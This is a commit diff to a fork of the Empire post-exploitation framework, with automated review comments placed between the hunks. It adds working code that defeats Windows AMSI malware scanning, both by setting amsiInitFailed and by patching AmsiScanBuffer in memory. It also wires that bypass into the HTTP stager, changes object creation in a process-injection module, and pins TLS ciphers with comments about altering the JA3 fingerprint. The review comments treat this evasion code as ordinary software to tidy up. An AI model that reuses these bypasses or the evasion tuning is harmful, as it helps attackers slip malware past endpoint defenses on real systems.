Merge pull request #1 from BC-SECURITY/hubble-changes-2
Hubble changes
vinnybod committed Aug 2, 2019
2 parents 7efb7ee + 7f5cc51 commit 1df878e
Showing 19 changed files with 132 additions and 88 deletions.
6 changes: 4 additions & 2 deletions data/module_source/management/Invoke-PSInject.ps1
Expand Up @@ -483,7 +483,8 @@ $RemoteScriptBlock = {

Function Get-Win32Constants
{
$Win32Constants = New-Object System.Object
$Creator = New-Object -ComObject RDS.DataSpace
$Win32Constants = $Creator.CreateObject('System.Object','')

$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
Expand Down Expand Up @@ -520,7 +521,8 @@ $RemoteScriptBlock = {

Function Get-Win32Functions
{
$Win32Functions = New-Object System.Object
$Creator = New-Object -ComObject RDS.DataSpace
$Win32Functions = $Creator.CreateObject('System.Object','')

$VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
$VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
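Review bot: The `$Creator = New-Object -ComObject RDS.DataSpace` / `$Win32Constants = $Creator.CreateObject('System.Object','')` pair that replaces the plain `New-Object System.Object` in both Get-Win32Constants and Get-Win32Functions carries no comment, and it makes both helpers depend on that COM class being registered on the host: if `New-Object -ComObject` throws, neither function produces its result object and every later `Add-Member` call in the body fails. A one-line comment above each pair stating the reason for the indirection and the failure behaviour when the class is unavailable would help the next maintainer, and moving the two identical lines into one small helper would keep the two copies in sync. Both function bodies continue past the hunk.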
81 changes: 25 additions & 56 deletions lib/common/bypasses.py
Expand Up @@ -29,77 +29,46 @@ def scriptBlockLogBypass():
def AMSIBypass():
# @mattifestation's AMSI bypass
bypass = helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
bypass += "'System.Management.Automation.AmsiUtils'"
bypass += "'System.Management.Automation.Amsi'+'Utils'"
bypass += helpers.randomize_capitalization(');$Ref.GetField(')
bypass += "'amsiInitFailed','NonPublic,Static'"
bypass += "'amsiInitF'+'ailed','NonPublic,Static'"
bypass += helpers.randomize_capitalization(").SetValue($null,$true);")
return bypass.replace('\n','').replace(' ', '')



def AMSIBypass2():
# rastamouse's AMSI bypass (Add-Type writes *.cs on disk!!)
# Modified implementation of Tal Liberman's AMSI bypass
bypass = """
$id = get-random;
$Ref = (
"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
);
$Source = @"
using System;
using System.Runtime.InteropServices;
namespace Bypass
{
public class AMSI$id
{
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
static extern void MoveMemory(IntPtr dest, IntPtr src, int size);
public static int Disable()
{
IntPtr TargetDLL = LoadLibrary("amsi.dll");
if (TargetDLL == IntPtr.Zero) { return 1; }
$MethodDefinition = @"
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
IntPtr ASBPtr = GetProcAddress(TargetDLL, "Amsi" + "Scan" + "Buffer");
if (ASBPtr == IntPtr.Zero) { return 1; }
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
UIntPtr dwSize = (UIntPtr)5;
uint Zero = 0;
if (!VirtualProtect(ASBPtr, dwSize, 0x40, out Zero)) { return 1; }
Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
IntPtr unmanagedPointer = Marshal.AllocHGlobal(6);
Marshal.Copy(Patch, 0, unmanagedPointer, 6);
MoveMemory(ASBPtr, unmanagedPointer, 6);
return 0;
}
}
}
"@;
Add-Type -ReferencedAssemblies $Ref -TypeDefinition $Source -Language CSharp;
iex "[Bypass.AMSI$id]::Disable() | Out-Null"
$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru;
$ABSD = 'AmsiS'+'canBuffer';
$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll');
[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD);
[UInt32]$Size = 0x5;
[UInt32]$ProtectFlag = 0x40;
[UInt32]$OldProtectFlag = 0;
[Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag);
$buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3);
[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6)
"""

bypass = bypass.replace('"kernel32"', '`"kernel32`"')
bypass = bypass.replace('"Kernel32.dll"', '`"Kernel32.dll`"')
bypass = bypass.replace('"RtlMoveMemory"', '`"RtlMoveMemory`"')
bypass = bypass.replace('"amsi.dll"', '`"amsi.dll`"')
bypass = bypass.replace('"Amsi"', '`"Amsi`"')
bypass = bypass.replace('"Scan"', '`"Scan`"')
bypass = bypass.replace('"Buffer"', '`"Buffer`"')
bypass = bypass.replace('@"','"')
bypass = bypass.replace('"@','"')
bypass = bypass.replace('\n','')
bypass = bypass.replace(' ', '')

return bypass
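Review bot: Six of the `bypass.replace(...)` calls after the here-string are now no-ops: the new `$MethodDefinition` text no longer contains `"Kernel32.dll"`, `"RtlMoveMemory"`, `"amsi.dll"` (it is single-quoted now), `"Amsi"`, `"Scan"` or `"Buffer"`, so only the `"kernel32"` replacement still matches anything. Dropping the dead calls would not change the returned string and would stop the next reader from hunting for text that is no longer there. The `[UInt32]`/`[Uint32]` casing on the `$buf` line is also inconsistent; PowerShell accepts both, but one spelling reads better.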
2 changes: 1 addition & 1 deletion lib/common/empire.py
Expand Up @@ -9,7 +9,7 @@
"""

# make version for Empire
VERSION = "2.5"
VERSION = "2.5 BC-Security Fork"

from pydispatch import dispatcher

10 changes: 5 additions & 5 deletions lib/common/messages.py
Expand Up @@ -25,12 +25,12 @@ def title(version):
Print the tool title, with version.
"""
os.system('clear')
print "================================================================"
print "================================================================================"
# print ' [Empire] PowerShell/Python post-exploitation framework'
print " [Empire] Post-Exploitation Framework"
print '================================================================'
print " [Version] %s | [Web] https://github.com/empireProject/Empire" % (version)
print '================================================================'
print " [Empire] Post-Exploitation Framework test1"
print '================================================================================'
print " [Version] %s | [Web] https://github.com/BC-SECURITY/DEFCON27" % (version)
print '================================================================================'
print """
_______ .___ ___. .______ __ .______ _______
| ____|| \/ | | _ \ | | | _ \ | ____|
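Review bot: The banner line `print " [Empire] Post-Exploitation Framework test1"` still carries what looks like a leftover placeholder suffix, `test1`, which will be printed to every user on startup; it should read `print " [Empire] Post-Exploitation Framework"` unless the suffix is intentional. The widened `'====...===='` rule is also repeated verbatim three times in this hunk; a single module-level string (or `'=' * 80`) would keep the width in one place. The title function continues past the hunk.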
8 changes: 4 additions & 4 deletions lib/listeners/http.py
Expand Up @@ -298,6 +298,9 @@ def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="",
# PowerShell

stager = '$ErrorActionPreference = \"SilentlyContinue\";'

if AMSIBypass:
stager += bypasses.AMSIBypass()
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
Expand Down Expand Up @@ -327,10 +330,6 @@ def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="",
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
stager += "'User-Agent',$u);"

if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
stager += "'User-Agent',$u);"

if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
Expand Down Expand Up @@ -1172,6 +1171,7 @@ def handle_post(request_uri):

context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
context.set_ciphers("ECDHE-RSA-AES128-GCM-SHA256")
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
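Review bot: `context.set_ciphers("ECDHE-RSA-AES128-GCM-SHA256")` pins the listener to exactly one suite, so the TLS handshake fails for any client whose cipher list lacks it and, because the suite is ECDHE-RSA, for any deployment whose `empire-priv.key`/`empire-chain.pem` pair is not an RSA key; `set_ciphers` itself raises `ssl.SSLError` when the local OpenSSL build does not offer that suite, which would abort listener startup without an explanation. The same literal is added in lib/listeners/http_com.py and lib/listeners/http_mapi.py; one named constant in a shared module, with a comment recording the RSA-certificate requirement, would keep the three listeners from drifting. The enclosing function begins outside the hunk.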
3 changes: 3 additions & 0 deletions lib/listeners/http_com.py
Expand Up @@ -834,6 +834,9 @@ def handle_post(request_uri):

context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
#setting the cipher list allows for modification of the JA3 signature
context.set_ciphers("ECDHE-RSA-AES128-GCM-SHA256")

app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
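Review bot: The comment `#setting the cipher list allows for modification of the JA3 signature` names the wrong fingerprint: JA3 is derived from the client's ClientHello, which a server-side cipher restriction does not touch; what `set_ciphers` influences is the suite the server selects, i.e. the server's JA3S value. Suggest `# restricting the server cipher list changes which suite is negotiated (JA3S); it does not alter the client's JA3` here and in lib/listeners/http_mapi.py, where the same comment was added. The enclosing function begins outside the hunk.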
2 changes: 2 additions & 0 deletions lib/listeners/http_mapi.py
Expand Up @@ -634,6 +634,8 @@ def handle_post(request_uri):

context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
#setting the cipher list allows for modification of the JA3 signature
context.set_ciphers("ECDHE-RSA-AES128-GCM-SHA256")
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
2 changes: 1 addition & 1 deletion lib/stagers/multi/bash.py
Expand Up @@ -57,7 +57,7 @@ def __init__(self, mainMenu, params=[]):
'Value' : 'True'
},
'AMSIBypass2' : {
'Description' : 'Include rastamouse\'s AMSI Bypass in the stager code.',
'Description' : 'Include Tal Liberman\'s AMSI Bypass in the stager code.',
'Required' : False,
'Value' : 'False'
}
4 changes: 2 additions & 2 deletions lib/stagers/multi/launcher.py
Expand Up @@ -53,7 +53,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
'Value' : r'Token\All\1'
},
'SafeChecks' : {
'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
Expand Down Expand Up @@ -86,7 +86,7 @@ def __init__(self, mainMenu, params=[]):
'Value' : 'True'
},
'AMSIBypass2' : {
'Description' : 'Include rastamouse\'s AMSI Bypass in the stager code.',
'Description' : 'Include Tal Liberman\'s AMSI Bypass in the stager code.',
'Required' : False,
'Value' : 'False'
}
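Review bot: The new `'Value' : r'Token\All\1'` default for ObfuscateCommand is now the same literal in this file and in lib/stagers/multi/war.py, lib/stagers/windows/ducky.py, hta.py, launcher_bat.py, launcher_sct.py, launcher_vbs.py and launcher_xml.py; the previous values had already drifted apart across those files (`\12467`, `\1234567`, `Launcher\PS`), which is the usual outcome of copy-pasted defaults. A single constant in lib/common that each `__init__` references would make the next change a one-line edit. The `__init__` bodies continue outside the hunks.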
2 changes: 1 addition & 1 deletion lib/stagers/multi/macro.py
Expand Up @@ -80,7 +80,7 @@ def __init__(self, mainMenu, params=[]):
'Value' : 'True'
},
'AMSIBypass2' : {
'Description' : 'Include rastamouse\'s AMSI Bypass in the stager code.',
'Description' : 'Include Tal Liberman\'s AMSI Bypass in the stager code.',
'Required' : False,
'Value' : 'False'
}
2 changes: 1 addition & 1 deletion lib/stagers/multi/war.py
Expand Up @@ -55,7 +55,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\1234567'
'Value' : r'Token\All\1'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
2 changes: 1 addition & 1 deletion lib/stagers/windows/ducky.py
Expand Up @@ -54,7 +54,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
'Value' : r'Token\All\1'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
2 changes: 1 addition & 1 deletion lib/stagers/windows/hta.py
Expand Up @@ -53,7 +53,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
'Value' : r'Token\All\1'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
2 changes: 1 addition & 1 deletion lib/stagers/windows/launcher_bat.py
Expand Up @@ -53,7 +53,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
'Value' : r'Token\All\1'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
2 changes: 1 addition & 1 deletion lib/stagers/windows/launcher_sct.py
Expand Up @@ -48,7 +48,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
'Value' : r'Token\All\1'
},
'OutFile': {
'Description': 'File to output SCT to, otherwise displayed on the screen.',
2 changes: 1 addition & 1 deletion lib/stagers/windows/launcher_vbs.py
Expand Up @@ -48,7 +48,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\PS\12467'
'Value' : r'Token\All\1'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
2 changes: 1 addition & 1 deletion lib/stagers/windows/launcher_xml.py
Expand Up @@ -43,7 +43,7 @@ def __init__(self, mainMenu, params=[]):
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1,Launcher\STDIN++\12467'
'Value' : r'Token\All\1'
},
'OutFile': {
'Description': 'File to output XML to, otherwise displayed on the screen.',
